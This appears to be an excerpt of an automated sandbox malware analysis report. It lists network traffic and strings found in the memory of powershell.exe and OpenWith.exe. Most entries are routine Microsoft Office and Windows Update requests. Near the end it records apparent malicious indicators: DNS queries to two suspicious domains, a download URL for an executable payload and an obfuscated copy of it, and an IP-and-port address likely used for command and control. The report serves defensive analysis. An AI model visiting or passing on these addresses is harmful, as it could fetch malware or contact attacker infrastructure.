Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic DNS traffic detected: DNS query: bemostake.space
Source: global traffic DNS traffic detected: DNS query: rocketdocs.lol
Source: global traffic DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bemostake.space
Source: powershell.exe, 00000001.00000002.1541187527.0000018C1E0B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1541187527.0000018C1E1F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0FBB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rocketdocs.lol
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0E041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1441747026.000001D898171000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1550976753.0000018C260CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: OpenWith.exe, 0000000B.00000003.1758526956.000001BD8757E000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1808084063.000001BD87593000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1635724874.000001BD8757B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758398905.000001BD87572000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1789392969.000001BD87593000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758526956.000001BD8758D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1594021561.000001BD8757A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0E041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1441747026.000001D898171000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F72C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bemostake.space
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exeHtj
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bp24mostakp24.spacp24/tp24st/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.p24xp24Ht
Source: powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: OpenWith.exe, 0000000B.00000003.1635591198.000001BD877F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: OpenWith.exe, 0000000B.00000003.1635591198.000001BD877F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0EC72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1541187527.0000018C1E0B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1541187527.0000018C1E1F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F76A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rocketdocs.lol
